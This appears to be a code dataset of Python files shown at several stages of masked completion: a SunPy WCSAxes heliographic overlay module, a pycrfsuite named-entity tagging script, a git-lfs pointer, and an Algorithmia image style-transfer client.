The ``rsun`` to use for the grid coordinate frame.
observer : `~astropy.coordinates.SkyCoord`
The ``observer`` to use for the grid coordinate frame. Only used for
Carrington coordinates.
system : str
Coordinate system for the grid. Must be 'stonyhurst' or 'carrington'.
If 'carrington', the ``observer`` keyword argument must be specified.
kwargs :
Additional keyword arguments are passed to
:meth:`astropy.visualization.wcsaxes.CoordinateHelper.grid`.
Returns
-------
`~astropy.visualization.wcsaxes.WCSAxes`
The overlay object.
Notes
-----
Keywords are passed to `~astropy.visualization.wcsaxes.coordinates_map.CoordinatesMap.grid`.
"""
if isinstance(grid_spacing, u.Quantity) and grid_spacing.size == 1:
lon_space = lat_space = grid_spacing
elif grid_spacing.size == 2:
lon_space, lat_space = grid_spacing
else:
raise ValueError(
'grid_spacing must be a Quantity of length one or two.')
if system == 'stonyhurst':
overlay = axes.get_coords_overlay(HeliographicStonyhurst(obstime=
obstime, rsun=rsun))
elif system == 'carrington':
overlay = axes.get_coords_overlay(HeliographicCarrington(obstime=
obstime, observer=observer, rsun=rsun))
else:
raise ValueError(
f"system must be 'stonyhurst' or 'carrington' (got '{system}')")
c1, c2 = axes.coords
c1.set_ticks_position('bl')
c2.set_ticks_position('bl')
lon = overlay[0]
lat = overlay[1]
if Version(astropy_version) >= Version('5.3.dev'):
lon.coord_wrap = 180 * u.deg
else:
lon.coord_wrap = 180
lon.set_major_formatter('dd')
if annotate:
lon.set_axislabel(f'{system.capitalize()} Longitude', minpad=0.8)
lat.set_axislabel(f'{system.capitalize()} Latitude', minpad=0.9)
lon.set_ticks_position('tr')
lat.set_ticks_position('tr')
else:
lat.set_ticks_visible(False)
lon.set_ticks_visible(False)
lat.set_ticklabel_visible(False)
lon.set_ticklabel_visible(False)
grid_kw = {'color': 'white', 'zorder': 100, 'alpha': 0.5}
grid_kw.update(kwargs)
tick_color = grid_kw['color'] if 'color' in kwargs else 'k'
lon.set_ticks(spacing=lon_space, color=tick_color)
lat.set_ticks(spacing=lat_space, color=tick_color)
overlay.grid(**grid_kw)
if axes.title:
x, y = axes.title.get_position()
axes.title.set_position([x, y + 0.08])
return overlay
| """
This module provides functions to make WCSAxes work in SunPy.
"""
import matplotlib.pyplot as plt
from packaging.version import Version
import astropy.units as u
from astropy import __version__ as astropy_version
from astropy.visualization import wcsaxes
from sunpy.coordinates import HeliographicCarrington, HeliographicStonyhurst
__all__ = ["is_wcsaxes", "gca_wcs", "get_world_transform",
"default_wcs_grid", "wcsaxes_heliographic_overlay"]
def is_wcsaxes(axes):
"""
Tests a `matplotlib.axes.Axes` object to see if it is an instance of
`~astropy.visualization.wcsaxes.WCSAxes`.
Parameters
----------
axes : `matplotlib.axes`
Axes to test.
Returns
-------
`bool`
Result of the test.
"""
return isinstance(axes, wcsaxes.WCSAxes)
def gca_wcs(wcs, fig=None, slices=None):
"""
Get the current axes, or create a new `~astropy.visualization.wcsaxes.WCSAxes`
if ``fig`` has no axes.
Parameters
----------
wcs : `astropy.wcs.WCS`
A `~astropy.wcs.WCS` object used to create a new axes.
fig : `matplotlib.figure.Figure`
The figure in which to check for the axes. If ``None``, the current
figure is used (or a new one created if there are no current figures).
slices : `tuple`
``slices`` is passed to `~astropy.visualization.wcsaxes.WCSAxes` to describe
which two dimensions of the `~astropy.wcs.WCS` object are being plotted.
This slices the multidimensional wcs object in the way it needs to be sliced.
Returns
-------
`matplotlib.axes.Axes` or `~astropy.visualization.wcsaxes.WCSAxes`
The current axes, or a new one if created.
"""
if not fig:
fig = plt.gcf()
if not len(fig.get_axes()):
ax = plt.axes(projection=wcs, slices=slices)
else:
ax = plt.gca()
return ax
def get_world_transform(axes):
"""
Get the transformation to world coordinates.
If the axes is a `~astropy.visualization.wcsaxes.WCSAxes` instance this
returns the transform to the "world" coordinates, otherwise it returns
the transform to the matplotlib data coordinates, which are assumed to be in
world coordinates.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes` or `~matplotlib.axes.Axes`
The axes to get the transform from.
Returns
-------
`~matplotlib.transforms.CompositeGenericTransform`
The transformation object.
"""
if is_wcsaxes(axes):
transform = axes.get_transform('world')
else:
transform = axes.transData
return transform
def default_wcs_grid(axes):
"""
Apply some default `~astropy.visualization.wcsaxes.WCSAxes` grid
formatting.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to draw the world
coordinate grid on.
"""
axes.coords.grid(color='white', alpha=0.6, linestyle='dotted',
linewidth=0.5)
@u.quantity_input
def wcsaxes_heliographic_overlay(axes, grid_spacing: u.deg = 10*u.deg, annotate=True,
obstime=None, rsun=None, observer=None, system='stonyhurst',
**kwargs):
"""
Create a heliographic overlay using
`~astropy.visualization.wcsaxes.WCSAxes`.
Will draw a grid and label the top axes.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to create the overlay on.
grid_spacing: `~astropy.units.Quantity`
Spacing for longitude and latitude grid in degrees.
annotate : `bool`
Passing `False` disables the axes labels and the ticks on the top and right axes.
obstime : `~astropy.time.Time`
The ``obstime`` to use for the grid coordinate frame.
rsun : `~astropy.units.Quantity`
The ``rsun`` to use for the grid coordinate frame.
observer : `~astropy.coordinates.SkyCoord`
The ``observer`` to use for the grid coordinate frame. Only used for
Carrington coordinates.
system : str
Coordinate system for the grid. Must be 'stonyhurst' or 'carrington'.
If 'carrington', the ``observer`` keyword argument must be specified.
kwargs :
Additional keyword arguments are passed to
:meth:`astropy.visualization.wcsaxes.CoordinateHelper.grid`.
Returns
-------
`~astropy.visualization.wcsaxes.WCSAxes`
The overlay object.
Notes
-----
Keywords are passed to `~astropy.visualization.wcsaxes.coordinates_map.CoordinatesMap.grid`.
"""
# Unpack spacing
if isinstance(grid_spacing, u.Quantity) and grid_spacing.size == 1:
lon_space = lat_space = grid_spacing
elif grid_spacing.size == 2:
lon_space, lat_space = grid_spacing
else:
raise ValueError("grid_spacing must be a Quantity of length one or two.")
if system == 'stonyhurst':
overlay = axes.get_coords_overlay(HeliographicStonyhurst(
obstime=obstime, rsun=rsun))
elif system == 'carrington':
overlay = axes.get_coords_overlay(HeliographicCarrington(
obstime=obstime, observer=observer, rsun=rsun))
else:
raise ValueError(f"system must be 'stonyhurst' or 'carrington' (got '{system}')")
# Set the native coordinates to be bottom and left only so they don't share
# axes with the overlay.
c1, c2 = axes.coords
c1.set_ticks_position('bl')
c2.set_ticks_position('bl')
lon = overlay[0]
lat = overlay[1]
# TODO: Remove when we depend on astropy 5.3
if Version(astropy_version) >= Version("5.3.dev"):
lon.coord_wrap = 180 * u.deg
else:
lon.coord_wrap = 180
lon.set_major_formatter('dd')
if annotate:
lon.set_axislabel(f'{system.capitalize()} Longitude', minpad=0.8)
lat.set_axislabel(f'{system.capitalize()} Latitude', minpad=0.9)
lon.set_ticks_position('tr')
lat.set_ticks_position('tr')
else:
lat.set_ticks_visible(False)
lon.set_ticks_visible(False)
lat.set_ticklabel_visible(False)
lon.set_ticklabel_visible(False)
grid_kw = {'color': 'white', 'zorder': 100, 'alpha': 0.5}
grid_kw.update(kwargs)
# Don't plot white ticks by default (only if explicitly asked)
tick_color = grid_kw['color'] if 'color' in kwargs else 'k'
lon.set_ticks(spacing=lon_space, color=tick_color)
lat.set_ticks(spacing=lat_space, color=tick_color)
overlay.grid(**grid_kw)
if axes.title:
x, y = axes.title.get_position()
axes.title.set_position([x, y + 0.08])
return overlay
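# A minimal usage sketch (not part of the module): overlay a 15-degree
# Stonyhurst grid on a sunpy map plot. AIA_171_IMAGE comes from the optional
# sunpy sample data and is only assumed here for illustration.
#
#     import astropy.units as u
#     import matplotlib.pyplot as plt
#     import sunpy.map
#     from sunpy.data.sample import AIA_171_IMAGE
#
#     aia = sunpy.map.Map(AIA_171_IMAGE)
#     ax = plt.subplot(projection=aia)
#     aia.plot(axes=ax)
#     wcsaxes_heliographic_overlay(ax, grid_spacing=15 * u.deg,
#                                  obstime=aia.date, rsun=aia.rsun_meters)
#     plt.show()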
| [
4,
5,
6,
7,
8
] |
607 | af9b83b6e213359f5e193918b6c09c22220e5457 | <mask token>
def word2features(sent, i):
word = sent[i][0]
tag = sent[i][1]
features = ['bias', 'word.lower=' + word.lower(), 'word[-3:]=' + word[-
3:], 'word[-2:]=' + word[-2:], 'word.isupper=%s' % word.isupper(),
'word.istitle=%s' % word.istitle(), 'word.isdigit=%s' % word.isdigit()]
if i > 0:
word1 = sent[i - 1][0]
tag1 = sent[i - 1][1]
features.extend(['-1:word.lower=' + word1.lower(),
'-1:word.istitle=%s' % word1.istitle(), '-1:word.isupper=%s' %
word1.isupper(), '-1:tag=' + tag1, '-1:tag[:2]=' + tag1[:2]])
else:
features.append('BOS')
if i < len(sent) - 1:
word1 = sent[i + 1][0]
tag1 = sent[i + 1][1]
features.extend(['+1:word.lower=' + word1.lower(),
'+1:word.istitle=%s' % word1.istitle(), '+1:word.isupper=%s' %
word1.isupper()])
else:
features.append('EOS')
return features
<mask token>
def sent2labels(sent):
return [label for token, label in sent]
<mask token>
def bio_classification_report(y_true, y_pred):
"""
Classification report for a list of BIO-encoded sequences.
It computes token-level metrics and discards "O" labels.
Note that it requires scikit-learn 0.15+ (or a version from github master)
to calculate averages properly!
"""
lb = LabelBinarizer()
y_true_combined = lb.fit_transform(list(chain.from_iterable(y_true)))
y_pred_combined = lb.transform(list(chain.from_iterable(y_pred)))
tagset = set(lb.classes_) - {'O'}
tagset = sorted(tagset, key=lambda tag: tag.split('-', 1)[::-1])
class_indices = {cls: idx for idx, cls in enumerate(lb.classes_)}
return classification_report(y_true_combined, y_pred_combined, labels=[
class_indices[cls] for cls in tagset], target_names=tagset)
def main():
argv = sys.argv
dirname = argv[1]
model = str(argv[2])
files = os.listdir(dirname)
sentences = []
for filename in files:
doc = open(dirname + filename, 'r')
tmp = []
for line in doc:
if line != '\n':
word, tag = line.split('\t')
tmp.append((word, tag[:-1]))
else:
sentences.append(tmp)
tmp = []
    sum_of_sentences = len(sentences)
    random.shuffle(sentences)
    test_size = math.floor(sum_of_sentences * 0.9)
test = sentences[0]
test_sents = sentences[1:test_size]
train_sents = sentences[test_size + 1:]
"""
    # Try cross-validation here
    # Or is the model itself the problem?
"""
X_train = [sent2features(s) for s in train_sents]
y_train = [sent2labels(s) for s in train_sents]
X_test = [sent2features(s) for s in test_sents]
y_test = [sent2labels(s) for s in test_sents]
trainer = pycrfsuite.Trainer(verbose=False)
for xseq, yseq in zip(X_train, y_train):
trainer.append(xseq, yseq)
trainer.set_params({'c1': 1.0, 'c2': 0.001, 'max_iterations': 100,
'feature.possible_transitions': True})
trainer.train(model)
tagger = pycrfsuite.Tagger()
tagger.open(model)
example_sent = test
for sentence in test_sents:
for token, correct, predict in zip(sent2tokens(sentence),
sent2labels(sentence), tagger.tag(sent2features(sentence))):
print(token + '\t' + correct + '\t' + predict)
print()
"""
    print(' '.join(sent2tokens(example_sent)), end='\n\n')
print("Predicted:", ' '.join(tagger.tag(sent2features(example_sent))))
print("Correct: ", ' '.join(sent2labels(example_sent)))
"""
y_pred = [tagger.tag(xseq) for xseq in X_test]
<mask token>
| <mask token>
def word2features(sent, i):
word = sent[i][0]
tag = sent[i][1]
features = ['bias', 'word.lower=' + word.lower(), 'word[-3:]=' + word[-
3:], 'word[-2:]=' + word[-2:], 'word.isupper=%s' % word.isupper(),
'word.istitle=%s' % word.istitle(), 'word.isdigit=%s' % word.isdigit()]
if i > 0:
word1 = sent[i - 1][0]
tag1 = sent[i - 1][1]
features.extend(['-1:word.lower=' + word1.lower(),
'-1:word.istitle=%s' % word1.istitle(), '-1:word.isupper=%s' %
word1.isupper(), '-1:tag=' + tag1, '-1:tag[:2]=' + tag1[:2]])
else:
features.append('BOS')
if i < len(sent) - 1:
word1 = sent[i + 1][0]
tag1 = sent[i + 1][1]
features.extend(['+1:word.lower=' + word1.lower(),
'+1:word.istitle=%s' % word1.istitle(), '+1:word.isupper=%s' %
word1.isupper()])
else:
features.append('EOS')
return features
def sent2features(sent):
return [word2features(sent, i) for i in range(len(sent))]
def sent2labels(sent):
return [label for token, label in sent]
<mask token>
def bio_classification_report(y_true, y_pred):
"""
Classification report for a list of BIO-encoded sequences.
It computes token-level metrics and discards "O" labels.
Note that it requires scikit-learn 0.15+ (or a version from github master)
to calculate averages properly!
"""
lb = LabelBinarizer()
y_true_combined = lb.fit_transform(list(chain.from_iterable(y_true)))
y_pred_combined = lb.transform(list(chain.from_iterable(y_pred)))
tagset = set(lb.classes_) - {'O'}
tagset = sorted(tagset, key=lambda tag: tag.split('-', 1)[::-1])
class_indices = {cls: idx for idx, cls in enumerate(lb.classes_)}
return classification_report(y_true_combined, y_pred_combined, labels=[
class_indices[cls] for cls in tagset], target_names=tagset)
def main():
argv = sys.argv
dirname = argv[1]
model = str(argv[2])
files = os.listdir(dirname)
sentences = []
for filename in files:
doc = open(dirname + filename, 'r')
tmp = []
for line in doc:
if line != '\n':
word, tag = line.split('\t')
tmp.append((word, tag[:-1]))
else:
sentences.append(tmp)
tmp = []
    sum_of_sentences = len(sentences)
    random.shuffle(sentences)
    test_size = math.floor(sum_of_sentences * 0.9)
test = sentences[0]
test_sents = sentences[1:test_size]
train_sents = sentences[test_size + 1:]
"""
    # Try cross-validation here
    # Or is the model itself the problem?
"""
X_train = [sent2features(s) for s in train_sents]
y_train = [sent2labels(s) for s in train_sents]
X_test = [sent2features(s) for s in test_sents]
y_test = [sent2labels(s) for s in test_sents]
trainer = pycrfsuite.Trainer(verbose=False)
for xseq, yseq in zip(X_train, y_train):
trainer.append(xseq, yseq)
trainer.set_params({'c1': 1.0, 'c2': 0.001, 'max_iterations': 100,
'feature.possible_transitions': True})
trainer.train(model)
tagger = pycrfsuite.Tagger()
tagger.open(model)
example_sent = test
for sentence in test_sents:
for token, correct, predict in zip(sent2tokens(sentence),
sent2labels(sentence), tagger.tag(sent2features(sentence))):
print(token + '\t' + correct + '\t' + predict)
print()
"""
    print(' '.join(sent2tokens(example_sent)), end='\n\n')
print("Predicted:", ' '.join(tagger.tag(sent2features(example_sent))))
print("Correct: ", ' '.join(sent2labels(example_sent)))
"""
y_pred = [tagger.tag(xseq) for xseq in X_test]
<mask token>
| <mask token>
def word2features(sent, i):
word = sent[i][0]
tag = sent[i][1]
features = ['bias', 'word.lower=' + word.lower(), 'word[-3:]=' + word[-
3:], 'word[-2:]=' + word[-2:], 'word.isupper=%s' % word.isupper(),
'word.istitle=%s' % word.istitle(), 'word.isdigit=%s' % word.isdigit()]
if i > 0:
word1 = sent[i - 1][0]
tag1 = sent[i - 1][1]
features.extend(['-1:word.lower=' + word1.lower(),
'-1:word.istitle=%s' % word1.istitle(), '-1:word.isupper=%s' %
word1.isupper(), '-1:tag=' + tag1, '-1:tag[:2]=' + tag1[:2]])
else:
features.append('BOS')
if i < len(sent) - 1:
word1 = sent[i + 1][0]
tag1 = sent[i + 1][1]
features.extend(['+1:word.lower=' + word1.lower(),
'+1:word.istitle=%s' % word1.istitle(), '+1:word.isupper=%s' %
word1.isupper()])
else:
features.append('EOS')
return features
def sent2features(sent):
return [word2features(sent, i) for i in range(len(sent))]
def sent2labels(sent):
return [label for token, label in sent]
def sent2tokens(sent):
return [token for token, label in sent]
def bio_classification_report(y_true, y_pred):
"""
Classification report for a list of BIO-encoded sequences.
It computes token-level metrics and discards "O" labels.
Note that it requires scikit-learn 0.15+ (or a version from github master)
to calculate averages properly!
"""
lb = LabelBinarizer()
y_true_combined = lb.fit_transform(list(chain.from_iterable(y_true)))
y_pred_combined = lb.transform(list(chain.from_iterable(y_pred)))
tagset = set(lb.classes_) - {'O'}
tagset = sorted(tagset, key=lambda tag: tag.split('-', 1)[::-1])
class_indices = {cls: idx for idx, cls in enumerate(lb.classes_)}
return classification_report(y_true_combined, y_pred_combined, labels=[
class_indices[cls] for cls in tagset], target_names=tagset)
def main():
argv = sys.argv
dirname = argv[1]
model = str(argv[2])
files = os.listdir(dirname)
sentences = []
for filename in files:
doc = open(dirname + filename, 'r')
tmp = []
for line in doc:
if line != '\n':
word, tag = line.split('\t')
tmp.append((word, tag[:-1]))
else:
sentences.append(tmp)
tmp = []
    sum_of_sentences = len(sentences)
    random.shuffle(sentences)
    test_size = math.floor(sum_of_sentences * 0.9)
test = sentences[0]
test_sents = sentences[1:test_size]
train_sents = sentences[test_size + 1:]
"""
    # Try cross-validation here
    # Or is the model itself the problem?
"""
X_train = [sent2features(s) for s in train_sents]
y_train = [sent2labels(s) for s in train_sents]
X_test = [sent2features(s) for s in test_sents]
y_test = [sent2labels(s) for s in test_sents]
trainer = pycrfsuite.Trainer(verbose=False)
for xseq, yseq in zip(X_train, y_train):
trainer.append(xseq, yseq)
trainer.set_params({'c1': 1.0, 'c2': 0.001, 'max_iterations': 100,
'feature.possible_transitions': True})
trainer.train(model)
tagger = pycrfsuite.Tagger()
tagger.open(model)
example_sent = test
for sentence in test_sents:
for token, correct, predict in zip(sent2tokens(sentence),
sent2labels(sentence), tagger.tag(sent2features(sentence))):
print(token + '\t' + correct + '\t' + predict)
print()
"""
    print(' '.join(sent2tokens(example_sent)), end='\n\n')
print("Predicted:", ' '.join(tagger.tag(sent2features(example_sent))))
print("Correct: ", ' '.join(sent2labels(example_sent)))
"""
y_pred = [tagger.tag(xseq) for xseq in X_test]
if __name__ == '__main__':
main()
| from itertools import chain
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.preprocessing import LabelBinarizer
import sklearn
import pycrfsuite
from sklearn import cross_validation
import sys
import os
import math
import random
def word2features(sent, i):
word = sent[i][0]
tag = sent[i][1]
features = ['bias', 'word.lower=' + word.lower(), 'word[-3:]=' + word[-
3:], 'word[-2:]=' + word[-2:], 'word.isupper=%s' % word.isupper(),
'word.istitle=%s' % word.istitle(), 'word.isdigit=%s' % word.isdigit()]
if i > 0:
word1 = sent[i - 1][0]
tag1 = sent[i - 1][1]
features.extend(['-1:word.lower=' + word1.lower(),
'-1:word.istitle=%s' % word1.istitle(), '-1:word.isupper=%s' %
word1.isupper(), '-1:tag=' + tag1, '-1:tag[:2]=' + tag1[:2]])
else:
features.append('BOS')
if i < len(sent) - 1:
word1 = sent[i + 1][0]
tag1 = sent[i + 1][1]
features.extend(['+1:word.lower=' + word1.lower(),
'+1:word.istitle=%s' % word1.istitle(), '+1:word.isupper=%s' %
word1.isupper()])
else:
features.append('EOS')
return features
def sent2features(sent):
return [word2features(sent, i) for i in range(len(sent))]
def sent2labels(sent):
return [label for token, label in sent]
def sent2tokens(sent):
return [token for token, label in sent]
def bio_classification_report(y_true, y_pred):
"""
Classification report for a list of BIO-encoded sequences.
It computes token-level metrics and discards "O" labels.
Note that it requires scikit-learn 0.15+ (or a version from github master)
to calculate averages properly!
"""
lb = LabelBinarizer()
y_true_combined = lb.fit_transform(list(chain.from_iterable(y_true)))
y_pred_combined = lb.transform(list(chain.from_iterable(y_pred)))
tagset = set(lb.classes_) - {'O'}
tagset = sorted(tagset, key=lambda tag: tag.split('-', 1)[::-1])
class_indices = {cls: idx for idx, cls in enumerate(lb.classes_)}
return classification_report(y_true_combined, y_pred_combined, labels=[
class_indices[cls] for cls in tagset], target_names=tagset)
def main():
argv = sys.argv
dirname = argv[1]
model = str(argv[2])
files = os.listdir(dirname)
sentences = []
for filename in files:
doc = open(dirname + filename, 'r')
tmp = []
for line in doc:
if line != '\n':
word, tag = line.split('\t')
tmp.append((word, tag[:-1]))
else:
sentences.append(tmp)
tmp = []
    sum_of_sentences = len(sentences)
    random.shuffle(sentences)
    test_size = math.floor(sum_of_sentences * 0.9)
test = sentences[0]
test_sents = sentences[1:test_size]
train_sents = sentences[test_size + 1:]
"""
    # Try cross-validation here
    # Or is the model itself the problem?
"""
X_train = [sent2features(s) for s in train_sents]
y_train = [sent2labels(s) for s in train_sents]
X_test = [sent2features(s) for s in test_sents]
y_test = [sent2labels(s) for s in test_sents]
trainer = pycrfsuite.Trainer(verbose=False)
for xseq, yseq in zip(X_train, y_train):
trainer.append(xseq, yseq)
trainer.set_params({'c1': 1.0, 'c2': 0.001, 'max_iterations': 100,
'feature.possible_transitions': True})
trainer.train(model)
tagger = pycrfsuite.Tagger()
tagger.open(model)
example_sent = test
for sentence in test_sents:
for token, correct, predict in zip(sent2tokens(sentence),
sent2labels(sentence), tagger.tag(sent2features(sentence))):
print(token + '\t' + correct + '\t' + predict)
print()
"""
    print(' '.join(sent2tokens(example_sent)), end='\n\n')
print("Predicted:", ' '.join(tagger.tag(sent2features(example_sent))))
print("Correct: ", ' '.join(sent2labels(example_sent)))
"""
y_pred = [tagger.tag(xseq) for xseq in X_test]
if __name__ == '__main__':
main()
| #crfで英文に固有表現認識(タグ付け)をする
#usr/bin/python3
#coding:utf-8
from itertools import chain
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.preprocessing import LabelBinarizer
import sklearn
import pycrfsuite
from sklearn import cross_validation
import sys
import os
import math
import random
def word2features(sent, i):
word = sent[i][0]
tag = sent[i][1]
features = [
'bias',
'word.lower=' + word.lower(),
'word[-3:]=' + word[-3:],
'word[-2:]=' + word[-2:],
'word.isupper=%s' % word.isupper(),
'word.istitle=%s' % word.istitle(),
'word.isdigit=%s' % word.isdigit(),
#'tag=' + tag,
#'tag[:2]=' + tag[:2],
]
if i > 0:
word1 = sent[i-1][0]
tag1 = sent[i-1][1]
features.extend([
'-1:word.lower=' + word1.lower(),
'-1:word.istitle=%s' % word1.istitle(),
'-1:word.isupper=%s' % word1.isupper(),
'-1:tag=' + tag1,
'-1:tag[:2]=' + tag1[:2],
])
else:
features.append('BOS')
if i < len(sent)-1:
word1 = sent[i+1][0]
tag1 = sent[i+1][1]
features.extend([
'+1:word.lower=' + word1.lower(),
'+1:word.istitle=%s' % word1.istitle(),
'+1:word.isupper=%s' % word1.isupper(),
#'+1:tag=' + tag1,
#s'+1:tag[:2]=' + tag1[:2],
])
else:
features.append('EOS')
return features
def sent2features(sent):
return [word2features(sent, i) for i in range(len(sent))]
def sent2labels(sent):
return [label for token, label in sent]
def sent2tokens(sent):
return [token for token, label in sent]
def bio_classification_report(y_true, y_pred):
"""
Classification report for a list of BIO-encoded sequences.
It computes token-level metrics and discards "O" labels.
Note that it requires scikit-learn 0.15+ (or a version from github master)
to calculate averages properly!
"""
lb = LabelBinarizer()
y_true_combined = lb.fit_transform(list(chain.from_iterable(y_true)))
y_pred_combined = lb.transform(list(chain.from_iterable(y_pred)))
tagset = set(lb.classes_) - {'O'}
#tagset = set(lb.classes_)
tagset = sorted(tagset, key=lambda tag: tag.split('-', 1)[::-1])
class_indices = {cls: idx for idx, cls in enumerate(lb.classes_)}
return classification_report(
y_true_combined,
y_pred_combined,
labels = [class_indices[cls] for cls in tagset],
target_names = tagset,
)
def main():
argv = sys.argv
dirname = argv[1]
model = str(argv[2])
    # read all the input files
    files = os.listdir(dirname)
    sentences = []
    # read them in, one sentence at a time
for filename in files:
doc = open(dirname+filename,"r")
tmp = []
        # gather the tokens for each sentence before appending
for line in doc:
if line != "\n":
word, tag = line.split("\t")
tmp.append((word,tag[:-1]))
else:
sentences.append(tmp)
tmp =[]
#for line in sentences:
#print(line)
    sum_of_sentences = len(sentences)
    #print("sentences: "+str(len(sentences)))
    #print(sentences[0])
    # shuffle the sentences randomly
    random.shuffle(sentences) # -> shuffles the original list in place rather than returning a new one
    #print(sentences[0])
    # split the sentences into train and test sets
    test_size = math.floor(sum_of_sentences*0.9)
test = sentences[0]
test_sents = sentences[1:test_size]
train_sents = sentences[test_size+1:]
"""
    # Try cross-validation here
    # Or is the model itself the problem?
"""
X_train = [sent2features(s) for s in train_sents]
y_train = [sent2labels(s) for s in train_sents]
X_test = [sent2features(s) for s in test_sents]
y_test = [sent2labels(s) for s in test_sents]
    # check whether the same token-tag pairs as in the training data are present
trainer = pycrfsuite.Trainer(verbose=False)
for xseq, yseq in zip(X_train, y_train):
trainer.append(xseq, yseq)
trainer.set_params({
'c1': 1.0, # coefficient for L1 penalty
'c2': 1e-3, # coefficient for L2 penalty
'max_iterations': 100, # stop earlier
# include transitions that are possible, but not observed
'feature.possible_transitions': True
})
#print(trainer.params())
trainer.train(model)
#print(len(trainer.logparser.iterations), trainer.logparser.iterations[-1])
tagger = pycrfsuite.Tagger()
tagger.open(model)
example_sent = test
for sentence in test_sents:
for token, correct, predict in zip(sent2tokens(sentence), sent2labels(sentence), tagger.tag(sent2features(sentence))):
print(token+"\t"+correct+"\t"+predict)
print()
"""
print(' '.join(sent2tokens(example_sent)), end='\n\n')
print("Predicted:", ' '.join(tagger.tag(sent2features(example_sent))))
print("Correct: ", ' '.join(sent2labels(example_sent)))
"""
    # check whether the test set contains sentences from the training set
y_pred = [tagger.tag(xseq) for xseq in X_test]
#print(bio_classification_report(y_test, y_pred))
if __name__ == '__main__':
main()
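# A minimal sketch of what the feature extractor produces; the toy tokens
# and tags below are invented for illustration.
#
#     toy = [('Obama', 'B-PER'), ('visited', 'O'), ('Tokyo', 'B-LOC')]
#     sent2features(toy)[0]   # features for 'Obama', including 'BOS'
#     sent2labels(toy)        # -> ['B-PER', 'O', 'B-LOC']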
| [
4,
5,
7,
8,
9
] |
608 | 932bb7c9dbf3e97c966d2d7d537e747756831e30 | version https://git-lfs.github.com/spec/v1
oid sha256:a2959c4cccf29b3797cc2e2dcef87ddb5a0779d9fb992bb38e190b791ae37eb0
size 88352
| null | null | null | null | [
0
] |
609 | 2536b22c2d154e87bdecb72cc967d8c56ddb73fb | <mask token>
def upload(client, fnames):
for im in fnames:
im = Path(im)
client.file(ORIGINAL_DATA_DIR + str(im.name)).put(im.read_bytes())
<mask token>
def style_transfer(fnames, out_folder, filter_name):
client = Algorithmia.client(API_KEY)
client.dir(ORIGINAL_DATA_DIR).create()
client.dir(TRANSFERD_DATA_DIR).create()
upload(client, fnames)
inputs = {'images': [(ORIGINAL_DATA_DIR + Path(im).name) for im in
fnames], 'savePaths': [(TRANSFERD_DATA_DIR + Path(im).name) for im in
fnames], 'filterName': filter_name}
algorithm_name = 'deeplearning/DeepFilter/0.6.0'
algo = client.algo(algorithm_name)
result = algo.pipe(inputs).result
download(client, out_folder)
return result
| <mask token>
def upload(client, fnames):
for im in fnames:
im = Path(im)
client.file(ORIGINAL_DATA_DIR + str(im.name)).put(im.read_bytes())
def download(client, folder):
folder = Path(folder)
transfered = client.dir(TRANSFERD_DATA_DIR)
for im in transfered.files():
(folder / Path(im.url).name).write_bytes(im.getBytes())
def style_transfer(fnames, out_folder, filter_name):
client = Algorithmia.client(API_KEY)
client.dir(ORIGINAL_DATA_DIR).create()
client.dir(TRANSFERD_DATA_DIR).create()
upload(client, fnames)
inputs = {'images': [(ORIGINAL_DATA_DIR + Path(im).name) for im in
fnames], 'savePaths': [(TRANSFERD_DATA_DIR + Path(im).name) for im in
fnames], 'filterName': filter_name}
algorithm_name = 'deeplearning/DeepFilter/0.6.0'
algo = client.algo(algorithm_name)
result = algo.pipe(inputs).result
download(client, out_folder)
return result
| <mask token>
API_KEY = os.environ.get('ALGO_API_KEY')
DATA_DIR_BASE = os.environ.get('DATA_DIR')
ORIGINAL_DATA_DIR = DATA_DIR_BASE + 'original/'
TRANSFERD_DATA_DIR = DATA_DIR_BASE + 'transferd/'
def upload(client, fnames):
for im in fnames:
im = Path(im)
client.file(ORIGINAL_DATA_DIR + str(im.name)).put(im.read_bytes())
def download(client, folder):
folder = Path(folder)
transfered = client.dir(TRANSFERD_DATA_DIR)
for im in transfered.files():
(folder / Path(im.url).name).write_bytes(im.getBytes())
def style_transfer(fnames, out_folder, filter_name):
client = Algorithmia.client(API_KEY)
client.dir(ORIGINAL_DATA_DIR).create()
client.dir(TRANSFERD_DATA_DIR).create()
upload(client, fnames)
inputs = {'images': [(ORIGINAL_DATA_DIR + Path(im).name) for im in
fnames], 'savePaths': [(TRANSFERD_DATA_DIR + Path(im).name) for im in
fnames], 'filterName': filter_name}
algorithm_name = 'deeplearning/DeepFilter/0.6.0'
algo = client.algo(algorithm_name)
result = algo.pipe(inputs).result
download(client, out_folder)
return result
| import os
from pathlib import Path
import Algorithmia
API_KEY = os.environ.get('ALGO_API_KEY')
DATA_DIR_BASE = os.environ.get('DATA_DIR')
ORIGINAL_DATA_DIR = DATA_DIR_BASE + 'original/'
TRANSFERD_DATA_DIR = DATA_DIR_BASE + 'transferd/'
def upload(client, fnames):
for im in fnames:
im = Path(im)
client.file(ORIGINAL_DATA_DIR + str(im.name)).put(im.read_bytes())
def download(client, folder):
folder = Path(folder)
transfered = client.dir(TRANSFERD_DATA_DIR)
for im in transfered.files():
(folder / Path(im.url).name).write_bytes(im.getBytes())
def style_transfer(fnames, out_folder, filter_name):
client = Algorithmia.client(API_KEY)
client.dir(ORIGINAL_DATA_DIR).create()
client.dir(TRANSFERD_DATA_DIR).create()
upload(client, fnames)
inputs = {'images': [(ORIGINAL_DATA_DIR + Path(im).name) for im in
fnames], 'savePaths': [(TRANSFERD_DATA_DIR + Path(im).name) for im in
fnames], 'filterName': filter_name}
algorithm_name = 'deeplearning/DeepFilter/0.6.0'
algo = client.algo(algorithm_name)
result = algo.pipe(inputs).result
download(client, out_folder)
return result
| import os
from pathlib import Path
import Algorithmia
API_KEY = os.environ.get('ALGO_API_KEY')
DATA_DIR_BASE = os.environ.get('DATA_DIR')
ORIGINAL_DATA_DIR = DATA_DIR_BASE + 'original/'
TRANSFERD_DATA_DIR = DATA_DIR_BASE + 'transferd/'
def upload(client, fnames):
for im in fnames:
im = Path(im)
client.file(ORIGINAL_DATA_DIR + str(im.name)).put(im.read_bytes())
def download(client, folder):
folder = Path(folder)
transfered = client.dir(TRANSFERD_DATA_DIR)
for im in transfered.files():
(folder / Path(im.url).name).write_bytes(im.getBytes())
